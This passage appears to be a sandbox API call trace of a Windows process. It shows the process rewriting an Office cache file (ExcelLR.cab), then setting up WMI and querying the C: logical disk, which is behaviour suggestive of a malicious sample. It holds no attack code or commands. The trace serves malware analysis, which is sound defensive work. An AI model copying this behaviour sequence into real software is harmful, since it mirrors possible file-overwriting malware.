Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab", lpFilePart=0x0) returned 0x4a [0166.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x69ded84) returned 1 [0166.280] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x58c [0166.282] GetFileType (hFile=0x58c) returned 0x1 [0166.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x69ded80) returned 1 [0166.282] GetFileType (hFile=0x58c) returned 0x1 [0166.282] WriteFile (in: hFile=0x58c, lpBuffer=0x2d581018*, nNumberOfBytesToWrite=0x102fed0, lpNumberOfBytesWritten=0x69dee40, lpOverlapped=0x0 | out: lpBuffer=0x2d581018*, lpNumberOfBytesWritten=0x69dee40*=0x102fed0, lpOverlapped=0x0) returned 1 [0170.414] CloseHandle (hObject=0x58c) returned 1 [0172.957] CoTaskMemAlloc (cb=0x20c) returned 0x98257d0 [0172.957] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x98257d0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0172.957] CoTaskMemFree (pv=0x98257d0) [0172.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x69de878, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0172.957] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69dedc0 | out: ppv=0x69dedc0*=0x72015c) returned 0x0 [0172.957] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69dedb8 | out: pAptType=0x69dedb8*=1) returned 0x0 [0172.957] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69dedbc | out: ppvObject=0x69dedbc*=0x0) returned 0x80004002 [0172.957] IUnknown:Release (This=0x72015c) returned 0x1 [0172.959] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de728 | out: ppv=0x69de728*=0x6737128) returned 0x0 [0172.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737128, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de940 | out: ppvObject=0x69de940*=0x0) returned 0x80004002 [0172.960] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737128, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de954 | out: ppvObject=0x69de954*=0x6733e30) returned 0x0 [0172.960] WbemDefPath:IUnknown:Release (This=0x6737128) returned 0x0 [0172.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733e30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de574 | out: ppvObject=0x69de574*=0x6733e30) returned 0x0 [0172.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733e30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de530 | out: ppvObject=0x69de530*=0x0) returned 0x80004002 [0172.960] WbemDefPath:IUnknown:AddRef (This=0x6733e30) returned 0x3 [0172.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733e30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dde8c | out: ppvObject=0x69dde8c*=0x0) returned 0x80004002 [0172.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733e30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69dde3c | out: ppvObject=0x69dde3c*=0x0) returned 0x80004002 [0172.960] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733e30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69dde48 | out: ppvObject=0x69dde48*=0x7ae3f0) returned 0x0 [0172.960] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae3f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69dde50 | out: pCid=0x69dde50*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0172.960] WbemDefPath:IUnknown:Release (This=0x7ae3f0) returned 0x3 [0172.960] CoGetContextToken (in: pToken=0x69ddea8 | out: pToken=0x69ddea8) returned 0x0 [0172.961] CoGetContextToken (in: pToken=0x69de2b0 | out: pToken=0x69de2b0) returned 0x0 [0172.961] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733e30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de340 | out: ppvObject=0x69de340*=0x0) returned 0x80004002 [0172.961] WbemDefPath:IUnknown:Release (This=0x6733e30) returned 0x2 [0172.961] WbemDefPath:IUnknown:Release (This=0x6733e30) returned 0x1 [0172.961] CoGetContextToken (in: pToken=0x69dec38 | out: pToken=0x69dec38) returned 0x0 [0172.961] CoGetContextToken (in: pToken=0x69deb98 | out: pToken=0x69deb98) returned 0x0 [0172.961] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733e30, riid=0x69dec68*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69dec64 | out: ppvObject=0x69dec64*=0x6733e30) returned 0x0 [0172.961] WbemDefPath:IUnknown:AddRef (This=0x6733e30) returned 0x3 [0172.961] WbemDefPath:IUnknown:Release (This=0x6733e30) returned 0x2 [0172.961] WbemDefPath:IWbemPath:SetText (This=0x6733e30, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733e30, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetText (in: This=0x6733e30, lFlags=2, puBuffLength=0x69dede8*=0x0, pszText=0x0 | out: puBuffLength=0x69dede8*=0x20, pszText=0x0) returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetText (in: This=0x6733e30, lFlags=2, puBuffLength=0x69dede8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x69dede8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733e30, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733e30, puCount=0x69dedec | out: puCount=0x69dedec*=0x0) returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733e30, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetInfo (in: This=0x6733e30, uRequestedInfo=0x0, puResponse=0x69dedf4 | out: puResponse=0x69dedf4*=0xc19) returned 0x0 [0172.961] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733e30, puCount=0x69ded6c | out: puCount=0x69ded6c*=0x0) returned 0x0 [0172.962] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x69ded58 | out: puCount=0x69ded58*=0x2) returned 0x0 [0172.962] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0x0, pszText=0x0 | out: puBuffLength=0x69ded54*=0xf, pszText=0x0) returned 0x0 [0172.962] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x69ded54*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded54*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0172.962] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded08 | out: ppv=0x69ded08*=0x72015c) returned 0x0 [0172.962] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded00 | out: pAptType=0x69ded00*=1) returned 0x0 [0172.962] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded04 | out: ppvObject=0x69ded04*=0x0) returned 0x80004002 [0172.962] IUnknown:Release (This=0x72015c) returned 0x1 [0172.962] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de670 | out: ppv=0x69de670*=0x6737138) returned 0x0 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737138, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de888 | out: ppvObject=0x69de888*=0x0) returned 0x80004002 [0172.963] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737138, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de89c | out: ppvObject=0x69de89c*=0x6733ea0) returned 0x0 [0172.963] WbemDefPath:IUnknown:Release (This=0x6737138) returned 0x0 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ea0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de4bc | out: ppvObject=0x69de4bc*=0x6733ea0) returned 0x0 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ea0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de478 | out: ppvObject=0x69de478*=0x0) returned 0x80004002 [0172.963] WbemDefPath:IUnknown:AddRef (This=0x6733ea0) returned 0x3 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ea0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69dddd4 | out: ppvObject=0x69dddd4*=0x0) returned 0x80004002 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ea0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddd84 | out: ppvObject=0x69ddd84*=0x0) returned 0x80004002 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ea0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69ddd90 | out: ppvObject=0x69ddd90*=0x77dae8) returned 0x0 [0172.963] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dae8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x69ddd98 | out: pCid=0x69ddd98*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0172.963] WbemDefPath:IUnknown:Release (This=0x77dae8) returned 0x3 [0172.963] CoGetContextToken (in: pToken=0x69dddf0 | out: pToken=0x69dddf0) returned 0x0 [0172.963] CoGetContextToken (in: pToken=0x69de1f8 | out: pToken=0x69de1f8) returned 0x0 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ea0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de288 | out: ppvObject=0x69de288*=0x0) returned 0x80004002 [0172.963] WbemDefPath:IUnknown:Release (This=0x6733ea0) returned 0x2 [0172.963] WbemDefPath:IUnknown:Release (This=0x6733ea0) returned 0x1 [0172.963] CoGetContextToken (in: pToken=0x69deb80 | out: pToken=0x69deb80) returned 0x0 [0172.963] CoGetContextToken (in: pToken=0x69deae0 | out: pToken=0x69deae0) returned 0x0 [0172.963] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733ea0, riid=0x69debb0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x69debac | out: ppvObject=0x69debac*=0x6733ea0) returned 0x0 [0172.963] WbemDefPath:IUnknown:AddRef (This=0x6733ea0) returned 0x3 [0172.964] WbemDefPath:IUnknown:Release (This=0x6733ea0) returned 0x2 [0172.964] WbemDefPath:IWbemPath:SetText (This=0x6733ea0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0172.964] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733ea0, puCount=0x69ded30 | out: puCount=0x69ded30*=0x2) returned 0x0 [0172.964] WbemDefPath:IWbemPath:GetText (in: This=0x6733ea0, lFlags=4, puBuffLength=0x69ded2c*=0x0, pszText=0x0 | out: puBuffLength=0x69ded2c*=0xf, pszText=0x0) returned 0x0 [0172.964] WbemDefPath:IWbemPath:GetText (in: This=0x6733ea0, lFlags=4, puBuffLength=0x69ded2c*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded2c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0172.964] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69ded30 | out: ppv=0x69ded30*=0x72015c) returned 0x0 [0172.964] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x69ded28 | out: pAptType=0x69ded28*=1) returned 0x0 [0172.964] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x69ded2c | out: ppvObject=0x69ded2c*=0x0) returned 0x80004002 [0172.964] IUnknown:Release (This=0x72015c) returned 0x1 [0172.964] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x69de950 | out: ppv=0x69de950*=0x673d1b0) returned 0x0 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x673d1b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69deb68 | out: ppvObject=0x69deb68*=0x0) returned 0x80004002 [0172.965] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d1b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb7c | out: ppvObject=0x69deb7c*=0x67370d8) returned 0x0 [0172.965] WbemLocator:IUnknown:Release (This=0x673d1b0) returned 0x0 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x67370d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de79c | out: ppvObject=0x69de79c*=0x67370d8) returned 0x0 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x67370d8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de758 | out: ppvObject=0x69de758*=0x0) returned 0x80004002 [0172.965] WbemLocator:IUnknown:AddRef (This=0x67370d8) returned 0x3 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x67370d8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de0b4 | out: ppvObject=0x69de0b4*=0x0) returned 0x80004002 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x67370d8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69de064 | out: ppvObject=0x69de064*=0x0) returned 0x80004002 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x67370d8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de070 | out: ppvObject=0x69de070*=0x0) returned 0x80004002 [0172.965] CoGetContextToken (in: pToken=0x69de0d0 | out: pToken=0x69de0d0) returned 0x0 [0172.965] CoGetContextToken (in: pToken=0x69de4d8 | out: pToken=0x69de4d8) returned 0x0 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x67370d8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de568 | out: ppvObject=0x69de568*=0x0) returned 0x80004002 [0172.965] WbemLocator:IUnknown:Release (This=0x67370d8) returned 0x2 [0172.965] WbemLocator:IUnknown:Release (This=0x67370d8) returned 0x1 [0172.965] CoGetContextToken (in: pToken=0x69deb48 | out: pToken=0x69deb48) returned 0x0 [0172.965] CoGetContextToken (in: pToken=0x69deaa8 | out: pToken=0x69deaa8) returned 0x0 [0172.965] WbemLocator:IUnknown:QueryInterface (in: This=0x67370d8, riid=0x69deb78*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x69deb74 | out: ppvObject=0x69deb74*=0x67370d8) returned 0x0 [0172.965] WbemLocator:IUnknown:AddRef (This=0x67370d8) returned 0x3 [0172.965] WbemLocator:IUnknown:Release (This=0x67370d8) returned 0x2 [0172.965] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6733ea0, puCount=0x69ded0c | out: puCount=0x69ded0c*=0x2) returned 0x0 [0172.965] WbemDefPath:IWbemPath:GetText (in: This=0x6733ea0, lFlags=8, puBuffLength=0x69ded08*=0x0, pszText=0x0 | out: puBuffLength=0x69ded08*=0xf, pszText=0x0) returned 0x0 [0172.965] WbemDefPath:IWbemPath:GetText (in: This=0x6733ea0, lFlags=8, puBuffLength=0x69ded08*=0xf, pszText="00000000000000" | out: puBuffLength=0x69ded08*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0172.965] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x69debe4 | out: ppv=0x69debe4*=0x6736fb8) returned 0x0 [0172.966] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736fb8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x69dec78 | out: ppNamespace=0x69dec78*=0x6747fa4) returned 0x0 [0174.848] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb14 | out: ppvObject=0x69deb14*=0x781bd4) returned 0x0 [0174.848] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781bd4, pProxy=0x6747fa4, pAuthnSvc=0x69deb64, pAuthzSvc=0x69deb60, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c, pImpLevel=0x69deb4c, pAuthInfo=0x69deb50, pCapabilites=0x69deb54 | out: pAuthnSvc=0x69deb64*=0xa, pAuthzSvc=0x69deb60*=0x0, pServerPrincName=0x69deb58, pAuthnLevel=0x69deb5c*=0x6, pImpLevel=0x69deb4c*=0x2, pAuthInfo=0x69deb50, pCapabilites=0x69deb54*=0x1) returned 0x0 [0174.848] WbemLocator:IUnknown:Release (This=0x781bd4) returned 0x1 [0174.848] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb08 | out: ppvObject=0x69deb08*=0x781bf4) returned 0x0 [0174.848] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69deb04 | out: ppvObject=0x69deb04*=0x781bd4) returned 0x0 [0174.849] WbemLocator:IClientSecurity:SetBlanket (This=0x781bd4, pProxy=0x6747fa4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0174.970] WbemLocator:IUnknown:Release (This=0x781bd4) returned 0x2 [0174.970] WbemLocator:IUnknown:Release (This=0x781bf4) returned 0x1 [0174.970] CoTaskMemFree (pv=0x77e148) [0174.970] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x0 [0175.149] WbemLocator:IUnknown:QueryInterface (in: This=0x6747fa4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69de704 | out: ppvObject=0x69de704*=0x781bf4) returned 0x0 [0175.149] WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x69de6c0 | out: ppvObject=0x69de6c0*=0x0) returned 0x80004002 [0175.237] WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x69de4dc | out: ppvObject=0x69de4dc*=0x0) returned 0x80004002 [0175.238] WbemLocator:IUnknown:AddRef (This=0x781bf4) returned 0x3 [0175.238] WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x69de01c | out: ppvObject=0x69de01c*=0x0) returned 0x80004002 [0175.238] WbemLocator:IUnknown:QueryInterface (in: This=0x781bf4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x69ddfcc | out: ppvObject=0x69ddfcc*=0x0) returned 0x80004002 [0175.239] 